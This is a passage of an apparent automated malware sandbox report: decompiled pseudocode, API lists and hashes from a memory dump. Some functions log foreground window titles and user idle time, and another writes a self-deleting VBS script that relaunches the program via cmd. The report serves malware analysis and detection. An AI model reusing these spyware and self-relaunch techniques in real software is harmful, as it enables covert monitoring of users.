								_t247 = _t246 | E0044B0F4(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
								_t248 = _t247 | E0044B0F4(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
								_t249 = _t248 | E0044B0F4(_t210, _t224, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
								_t250 = _t249 | E0044B0F4(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
								_t251 = _t250 | E0044B0F4(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
								_t252 = _t251 | E0044B0F4(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
								_t253 = _t252 | E0044B0F4(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
								_t254 = _t253 | E0044B0F4(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
								_t255 = _t254 | E0044B0F4(_t210, _t224, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
								_t256 = _t255 | E0044B0F4(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
								if((E0044B0F4(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
									_t226 =  *_v20;
									while( *_t226 != 0) {
										_t195 =  *_t226;
										if(_t195 < 0x30 || _t195 > 0x39) {
											if(_t195 != 0x3b) {
												goto L17;
											}
											_t257 = _t226;
											do {
												 *_t257 =  *((intOrPtr*)(_t257 + 1));
												_t257 = _t257 + 1;
											} while ( *_t257 != 0);
										} else {
											 *_t226 = _t195 - 0x30;
											L17:
											_t226 = _t226 + 1;
										}
									}
									goto L25;
								}
								E00448782(_v8);
								E004401F5(_v8);
								E004401F5(_v12);
								E004401F5(_v16);
								goto L4;
							}
							E004401F5(_t234);
							E004401F5(_v12);
							L7:
							goto L4;
						}
						E004401F5(_t234);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t231 = 0;
					_v12 = 0;
					_t236 = 0x46a188;
					L27:
					_t105 =  *(_t210 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							E004401F5( *(_t210 + 0x88));
							E004401F5( *((intOrPtr*)(_t210 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
					 *(_t210 + 0x84) = _t231;
					 *(_t210 + 0x88) = _t236;
					return 0;
				}
			}

0x00448880
0x00448889
0x00448890
0x00448893
0x00448896
0x0044889f
0x004488c1
0x004488c5
0x004488c8
0x004488d2
0x004488e5
0x004488e9
0x004488ec
0x004488f6
0x00448908
0x00448b9e
0x00448b9f
0x00448ba1
0x00448ba9
0x00448bad
0x00448bb2
0x00448bbd
0x00448bc9
0x00448bd5
0x00448be1
0x00448be7
0x00448beb
0x00448bed
0x00448bed
0x00000000
0x00448beb
0x00448917
0x0044891b
0x0044891e
0x00448928
0x0044893c
0x00448942
0x00448957
0x0044896b
0x00448982
0x0044899c
0x004489a4
0x004489b6
0x004489cd
0x004489e4
0x004489fe
0x00448a15
0x00448a2c
0x00448a43
0x00448a5d
0x00448a74
0x00448a8b
0x00448aa2
0x00448abc
0x00448ad3
0x00448aea
0x00448b01
0x00448b1b
0x00448b37
0x00448b65
0x00448b78
0x00448b69
0x00448b6d
0x00448b81
0x00000000
0x00000000
0x00448b83
0x00448b85
0x00448b88
0x00448b8a
0x00448b8d
0x00448b73
0x00448b75
0x00448b77
0x00448b77
0x00448b77
0x00448b6d
0x00000000
0x00448b7d
0x00448b3d
0x00448b43
0x00448b4c
0x00448b55
0x00000000
0x00448b5a
0x0044892b
0x00448934
0x004488fe
0x00000000
0x004488fe
0x004488f9
0x00000000
0x004488f9
0x004488d4
0x00000000
0x004488a9
0x004488a9
0x004488ab
0x004488ae
0x00448bef
0x00448bef
0x00448bf7
0x00448bf9
0x00448bf9
0x00448c01
0x00448c06
0x00448c0a
0x00448c12
0x00448c1a
0x00448c20
0x00448c0a
0x00448c24
0x00448c29
0x00448c2f
0x00000000
0x00448c2f

APIs

_free.LIBCMT ref: 004488C8
_free.LIBCMT ref: 004488EC
_free.LIBCMT ref: 004488F9
_free.LIBCMT ref: 0044891E
_free.LIBCMT ref: 0044892B
_free.LIBCMT ref: 00448934
_free.LIBCMT ref: 00448C12
_free.LIBCMT ref: 00448C1A

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 093d3ab02af58179c34815fd7c942b7be1f6580471e291e3d849a237f0931bef
Instruction ID: 0fd459aec3f5e05b68cc896b93c3b77f39616f80babc804ed9fa449a4b9e12b5
Opcode Fuzzy Hash: 093d3ab02af58179c34815fd7c942b7be1f6580471e291e3d849a237f0931bef
Instruction Fuzzy Hash: 0EC10571E40204AFEB20DBA9CC42FEF77F8EB49705F14415AFB05EB282D6B499419798

Uniqueness

Uniqueness Score: -1.00%

Function 0044F255, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E0044F255(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed char _t242;
				intOrPtr _t245;
				void* _t248;
				void* _t252;
				void* _t262;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t270;
				void* _t272;
				void* _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t280;
				void* _t284;

				_t262 = L0044EFB8(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t262, _t192 << 2);
				_t274 = _t272 + 0x1c;
				_t248 = _t262 + _t192 + _t192;
				_t263 = _t262 | 0xffffffff;
				if(_v36 != _t263) {
					_t114 = E00448575(_t248, _t263, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t263;
					if(_t114 != _t263) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t275 = _t274 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t275,  &_v48, 1 << 2);
						_t197 = 0;
						_t252 = L0044EF23();
						_t277 = _t275 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t252);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E004484BE(_t197,  *_t190, _t252);
								_t242 = _v5 | 0x00000001;
								_v5 = _t242;
								_v48 = _t242;
								 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x46b800 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t278 = _t277 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t278,  &_v48, _t206 << 2);
									_t134 = L0044ECD6(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t280 = _t278 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x46b800 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t266 = _v44;
										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
										if((_t266 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t266 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
											_t245 = L0044EF23();
											__eflags = _t245 - 0xffffffff;
											if(_t245 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0x46b800 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
												goto L31;
											}
											E0043A4CE(GetLastError());
											 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											E00448687( *_t190);
											L10:
											goto L2;
										}
									}
									_t269 = _t134;
									goto L22;
								} else {
									_t269 = E0044F134(_t205,  *_t190);
									__eflags = _t269;
									if(__eflags != 0) {
										L22:
										E0044551E(__eflags,  *_t190);
										return _t269;
									}
									goto L20;
								}
							}
							_t270 = GetLastError();
							E0043A4CE(_t270);
							 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t252);
							__eflags = _t270;
							if(_t270 == 0) {
								 *((intOrPtr*)(E0043A504())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x46b800 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E0043A4CE(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t284 = _t277 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t284,  &_v48, _t239 << 2);
						_t197 = 0;
						_t252 = L0044EF23();
						_t277 = _t284 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E0043A4F1()) =  *_t186 & 0x00000000;
						 *_t190 = _t263;
						 *((intOrPtr*)(E0043A504())) = 0x18;
						goto L2;
					}
				} else {
					 *(E0043A4F1()) =  *_t188 & 0x00000000;
					 *_a8 = _t263;
					L2:
					return  *((intOrPtr*)(E0043A504()));
				}
			}

0x0044f278
0x0044f27c
0x0044f27d
0x0044f27d
0x0044f27d
0x0044f27f
0x0044f285
0x0044f2a0
0x0044f2a5
0x0044f2a8
0x0044f2aa
0x0044f2ac
0x0044f2cb
0x0044f2d2
0x0044f2d9
0x0044f2dc
0x0044f2e8
0x0044f2eb
0x0044f2f3
0x0044f2f4
0x0044f2f7
0x0044f2f7
0x0044f2fe
0x0044f300
0x0044f303
0x0044f30b
0x0044f30e
0x0044f37b
0x0044f37c
0x0044f382
0x0044f384
0x0044f3cd
0x0044f3d0
0x0044f3d9
0x0044f3dc
0x0044f3df
0x0044f3e1
0x0044f3e1
0x0044f3e1
0x0044f3d2
0x0044f3d5
0x0044f3d5
0x0044f3e6
0x0044f3e9
0x0044f3f5
0x0044f3fa
0x0044f406
0x0044f410
0x0044f414
0x0044f41e
0x0044f421
0x0044f42c
0x0044f431
0x0044f441
0x0044f444
0x0044f448
0x0044f449
0x0044f44f
0x0044f454
0x0044f457
0x0044f459
0x0044f45b
0x0044f460
0x0044f463
0x0044f465
0x0044f48f
0x0044f4b3
0x0044f4b7
0x0044f4bb
0x0044f4bd
0x0044f4c1
0x0044f4c3
0x0044f4cd
0x0044f4d0
0x0044f4d7
0x0044f4d7
0x0044f4d7
0x0044f4d7
0x0044f4c1
0x0044f4dc
0x0044f4e8
0x0044f4ea
0x0044f575
0x0044f575
0x00000000
0x0044f4f0
0x0044f4f0
0x0044f4f4
0x00000000
0x00000000
0x0044f4f9
0x0044f50b
0x0044f513
0x0044f516
0x0044f517
0x0044f51a
0x0044f521
0x0044f526
0x0044f529
0x0044f55d
0x0044f567
0x0044f567
0x0044f571
0x00000000
0x0044f571
0x0044f532
0x0044f54b
0x0044f552
0x0044f375
0x00000000
0x0044f375
0x0044f4ea
0x0044f467
0x00000000
0x0044f433
0x0044f43a
0x0044f43d
0x0044f43f
0x0044f469
0x0044f46b
0x00000000
0x0044f471
0x00000000
0x0044f43f
0x0044f431
0x0044f38c
0x0044f38f
0x0044f3aa
0x0044f3af
0x0044f3b5
0x0044f3b7
0x0044f3c2
0x0044f3c2
0x00000000
0x0044f3b7
0x0044f310
0x0044f317
0x0044f319
0x0044f350
0x0044f350
0x0044f35a
0x0044f35d
0x0044f364
0x0044f364
0x0044f364
0x0044f370
0x00000000
0x0044f370
0x0044f31b
0x0044f31f
0x00000000
0x00000000
0x0044f321
0x0044f330
0x0044f335
0x0044f338
0x0044f339
0x0044f33c
0x0044f33c
0x0044f343
0x0044f345
0x0044f348
0x0044f34b
0x0044f34e
0x00000000
0x00000000
0x00000000
0x0044f2ae
0x0044f2b3
0x0044f2b6
0x0044f2bd
0x00000000
0x0044f2bd
0x0044f287
0x0044f28c
0x0044f292
0x0044f294
0x00000000
0x0044f299

APIs

Part of subcall function 0044EF23: CreateFileW.KERNEL32(00000000,00000000,?,0044F2FE,?,?,00000000,?,0044F2FE,00000000,0000000C), ref: 0044EF40

GetLastError.KERNEL32 ref: 0044F369
__dosmaperr.LIBCMT ref: 0044F370
GetFileType.KERNEL32(00000000), ref: 0044F37C
GetLastError.KERNEL32 ref: 0044F386
__dosmaperr.LIBCMT ref: 0044F38F
CloseHandle.KERNEL32(00000000), ref: 0044F3AF
CloseHandle.KERNEL32(?), ref: 0044F4F9
GetLastError.KERNEL32 ref: 0044F52B
__dosmaperr.LIBCMT ref: 0044F532

Strings

H, xrefs: 0044F4B7

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 47bb2141c220456fdb7a8c8012237244b82838329f6a58beebc578ef5c24065f
Instruction ID: 8387d8c7474957efea47537ed2c3f831a95fafc38b1db0bb8119202e772c3410
Opcode Fuzzy Hash: 47bb2141c220456fdb7a8c8012237244b82838329f6a58beebc578ef5c24065f
Instruction Fuzzy Hash: 18A15A32A105489FEF19DF68D8417AE7BA0EB06324F14016EF801DB392DB799D16CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00409195, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156
sleepCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00409195(void* __ecx, void* __edx) {
				char _v28;
				char _v56;
				char _v76;
				char _v80;
				char _v100;
				void* _v104;
				char _v108;
				char _v112;
				struct HWND__* _v116;
				void* __ebx;
				void* __edi;
				int _t36;
				struct HWND__* _t42;
				void* _t50;
				int _t57;
				struct HWND__* _t77;
				void* _t119;
				signed int _t125;
				void* _t127;

				_t112 = __edx;
				_t127 = (_t125 & 0xfffffff8) - 0x74;
				_push(_t77);
				_push(0xea60);
				_t119 = __ecx;
				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
					Sleep(0x1f4);
					_t77 = GetForegroundWindow();
					_t36 = GetWindowTextLengthW(_t77);
					_t4 = _t36 + 1; // 0x1
					L00409DEC(_t77,  &_v100, _t112, _t119, _t4, 0);
					if(_t36 != 0) {
						_t57 = E00402489();
						GetWindowTextW(_t77, L00401EEB( &_v100), _t57);
						_t112 = 0x46dd0c;
						if(L00409EAC(0x46dd0c) == 0) {
							L00409DD2(0x46dd0c,  &_v100);
							E0040733F(E00402489() - 1);
							_t127 = _t127 - 0x18;
							_t136 =  *0x46c39b;
							if( *0x46c39b == 0) {
								_t112 = L00409E69( &_v76, L"\r\n[ ", __eflags,  &_v108);
								E004030A6(_t77, _t127, _t67, _t119, __eflags, L" ]\r\n");
								E00408B80(_t119);
								L00401EF0();
							} else {
								E00407350(_t77, _t127, 0x46dd0c, _t136,  &_v108);
								E00409634(_t77, _t119, _t136);
							}
						}
					}
					_t83 = _t119;
					L00409C15(_t119);
					if(E004171D6(_t119) < 0xea60) {
						L18:
						L00401EF0();
						continue;
					} else {
						_t77 = _v116;
						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
							_t42 = E004171D6(_t83);
							if(_t42 < 0xea60) {
								__eflags = _t77 % 0xea60;
								E0043BACE(_t83, _t77 / 0xea60,  &_v112, 0xa);
								_t50 = E00405343(_t77,  &_v80, E004075C2(_t77,  &_v56, "\r\n{ User has been idle for ", _t119, __eflags, E00402084(_t77,  &_v28,  &_v112)), _t119, __eflags, " minutes }\r\n");
								_t127 = _t127 + 0xc - 0x14;
								_t112 = _t50;
								E004172DA(_t127, _t50);
								E00408B80(_t119);
								E00401FC7();
								E00401FC7();
								E00401FC7();
								goto L18;
							}
							_t77 = _t42;
							_v116 = _t77;
							Sleep(0x3e8);
						}
						L00401EF0();
						break;
					}
				}
				__eflags = 0;
				return 0;
			}

0x00409195
0x0040919b
0x0040919e
0x0040919f
0x004091a1
0x004091a3
0x00409202
0x0040920e
0x00409211
0x0040921b
0x00409223
0x0040922a
0x00409234
0x00409245
0x0040924b
0x0040925b
0x00409267
0x0040927b
0x00409280
0x00409287
0x0040928e
0x004092b8
0x004092bc
0x004092c4
0x004092cd
0x00409290
0x00409293
0x0040929a
0x0040929a
0x0040928e
0x0040925b
0x004092d2
0x004092d4
0x004092e5
0x0040938d
0x00409391
0x00000000
0x004092eb
0x004092eb
0x004092ef
0x004092ff
0x00409306
0x00409326
0x00409329
0x0040935a
0x0040935f
0x00409362
0x00409366
0x0040936d
0x00409376
0x0040937f
0x00409388
0x00000000
0x00409388
0x00409308
0x0040930f
0x00409313
0x00409313
0x0040939f
0x00000000
0x0040939f
0x004092e5
0x004093a6
0x004093ac

APIs

__Init_thread_footer.LIBCMT ref: 004091F7
Sleep.KERNEL32(000001F4), ref: 00409202
GetForegroundWindow.USER32 ref: 00409208
GetWindowTextLengthW.USER32(00000000), ref: 00409211
GetWindowTextW.USER32 ref: 00409245
Sleep.KERNEL32(000003E8), ref: 00409313

Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79

Part of subcall function 00408B80: SetEvent.KERNEL32(?,?,?,?,00409CFC,?,?,?,?,?,00000000), ref: 00408BAD

Strings

[ , xrefs: 004092AD
minutes }, xrefs: 00409339
{ User has been idle for , xrefs: 00409345
], xrefs: 004092A7

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
String ID: [ ${ User has been idle for $ ]$ minutes }
API String ID: 107669343-3343415809
Opcode ID: 5208e0e58cc42efc71676e40296c05a26964b477c59cb947b62b6e083ccbcc4a
Instruction ID: 503b2ce70374cf4332f5393007fb2740c98398301deed75f23da1ef1a57f7c11
Opcode Fuzzy Hash: 5208e0e58cc42efc71676e40296c05a26964b477c59cb947b62b6e083ccbcc4a
Instruction Fuzzy Hash: A251D3716082415BC314FB25D846A6E77A5AF84348F44093FF842A62E3EF7C9E45C69E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B488, Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B488(void* __ebx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				short _v716;
				void* __edi;
				void* __ebp;
				void* _t36;
				void* _t37;
				void* _t40;
				void* _t54;
				void* _t67;
				void* _t68;
				void* _t79;

				_t79 = __ebx;
				E0041015B();
				_t36 = E00402489();
				_t37 = L00401F95(0x46c560);
				_t40 = E00410A30(L00401F95(0x46c518), "exepath",  &_v716, 0x208, _t37, _t36);
				_t140 = _t40;
				if(_t40 == 0) {
					GetModuleFileNameW(0,  &_v716, 0x208);
				}
				E004030A6(_t79,  &_v124, E004172DA( &_v52, E00417093( &_v76)), 0, _t140, L".vbs");
				L00401EF0();
				E00401FC7();
				E00404429(_t79,  &_v100, E004030A6(_t79,  &_v76, E0040427F(_t79,  &_v52, E0043987F(_t79,  &_v76, _t140, L"Temp")), 0, _t140, "\\"), _t140,  &_v124);
				L00401EF0();
				L00401EF0();
				L00401F6D(_t79,  &_v28);
				_t54 = E0040427F(_t79,  &_v196, L"\"\"\", 0");
				E00403311(E004030A6(_t79,  &_v76, E00403030( &_v52, E004030A6(_t79,  &_v148, E0040427F(_t79,  &_v172, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t140,  &_v716), _t54), 0, _t140, "\n"));
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				E0040766C(_t79,  &_v28, 0, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
				_t67 = L00401EEB( &_v100);
				_t68 = E00402489();
				if(E00417947(L00401EEB( &_v28), _t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", L00401EEB( &_v100), 0x45f724, 0x45f724, 0) > 0x20) {
					ExitProcess(0);
				}
				L00401EF0();
				L00401EF0();
				return L00401EF0();
			}

0x0040b488
0x0040b493
0x0040b49f
0x0040b4a7
0x0040b4cb
0x0040b4d5
0x0040b4d7
0x0040b4e2
0x0040b4e2
0x0040b504
0x0040b50d
0x0040b515
0x0040b547
0x0040b550
0x0040b558
0x0040b560
0x0040b575
0x0040b5ba
0x0040b5c2
0x0040b5ca
0x0040b5d5
0x0040b5e0
0x0040b5eb
0x0040b5f8
0x0040b601
0x0040b60a
0x0040b628
0x0040b64d
0x0040b64d
0x0040b656
0x0040b65e
0x0040b670

APIs

Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E

Part of subcall function 00410A30: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
Part of subcall function 00410A30: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
Part of subcall function 00410A30: RegCloseKey.KERNELBASE(00000000), ref: 00410A70

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B4E2
ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B641
ExitProcess.KERNEL32 ref: 0040B64D

Strings

.vbs, xrefs: 0040B4E8
exepath, xrefs: 0040B4BA
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040B5F0
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040B582
Temp, xrefs: 0040B523
open, xrefs: 0040B63B
""", 0, xrefs: 0040B56A

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-2411266221
Opcode ID: 4ff7fbb3db5958efe8936c203b739a681e523bfe342416ada23fe6195d9952c0
Instruction ID: 1eb9c9899973781d748da32130d6708d7247d8467cae5aa57bbac03f0cab9b6b
Opcode Fuzzy Hash: 4ff7fbb3db5958efe8936c203b739a681e523bfe342416ada23fe6195d9952c0
Instruction Fuzzy Hash: C74150319101185ACB14FB61DC92DEE7779AF60748F10007FF806721E2EF385E4ACA99

Uniqueness

Uniqueness Score: -1.00%

Function 0043558A, Relevance: 16.6, APIs: 11, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043558A(void* __edx, void* __eflags, char* _a4, int _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* __ebx;
				char* _t31;
				int _t35;
				int _t43;
				void* _t51;
				int _t52;
				int _t54;
				void* _t56;
				void* _t63;
				short* _t64;
				short* _t67;

				_t62 = __edx;
				E00435507(_t51,  &_v28, __edx, _a24);
				_t52 = 0;
				_t54 =  *(_v24 + 0x14);
				_t31 = _a4;
				_v8 = _t54;
				if(_t31 == 0) {
					L4:
					 *((intOrPtr*)(E0043A504())) = 0x16;
					E0043695D();
					L18:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return _t52;
				}
				_t66 = _a8;
				if(_a8 == 0) {
					goto L4;
				}
				 *_t31 = 0;
				if(_a12 == 0 || _a16 == 0) {
					goto L4;
				} else {
					_t35 = MultiByteToWideChar(_t54, 0, _a12, 0xffffffff, 0, 0);
					_v12 = _t35;
					if(_t35 != 0) {
						_t64 = E0043F98C(_t54, _t35 + _t35);
						_t56 = _t63;
						if(_t64 != 0) {
							if(MultiByteToWideChar(_v8, 0, _a12, 0xffffffff, _t64, _v12) != 0) {
								_t67 = E0043F98C(_t56, _t66 + _t66);
								if(_t67 != 0) {
									_t43 = E00441453(0, _t62, _t67, _a8, _t64, _a16, _a20, _a24);
									_v12 = _t43;
									if(_t43 != 0) {
										if(WideCharToMultiByte(_v8, 0, _t67, 0xffffffff, _a4, _a8, 0, 0) != 0) {
											_t52 = _v12;
										} else {
											E0043A4CE(GetLastError());
										}
									}
								}
								E004401F5(_t67);
							} else {
								E0043A4CE(GetLastError());
							}
						}
						E004401F5(_t64);
					} else {
						E0043A4CE(GetLastError());
					}
					goto L18;
				}
			}

0x0043558a
0x0043559a
0x004355a2
0x004355a4
0x004355a7
0x004355aa
0x004355af
0x004355c4
0x004355c9
0x004355cf
0x004356a1
0x004356a5
0x004356aa
0x004356aa
0x004356b8
0x004356b8
0x004355b1
0x004355b6
0x00000000
0x00000000
0x004355b8
0x004355bd
0x00000000
0x004355d9
0x004355e2
0x004355e8
0x004355ed
0x0043560a
0x0043560c
0x0043560f
0x0043562a
0x00435643
0x00435648
0x00435658
0x00435660
0x00435665
0x0043567e
0x0043568f
0x00435680
0x00435687
0x0043568c
0x0043567e
0x00435665
0x00435693
0x0043562c
0x00435633
0x00435633
0x00435698
0x0043569a
0x004355ef
0x004355f6
0x004355fb
0x00000000
0x004355ed

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004355E2
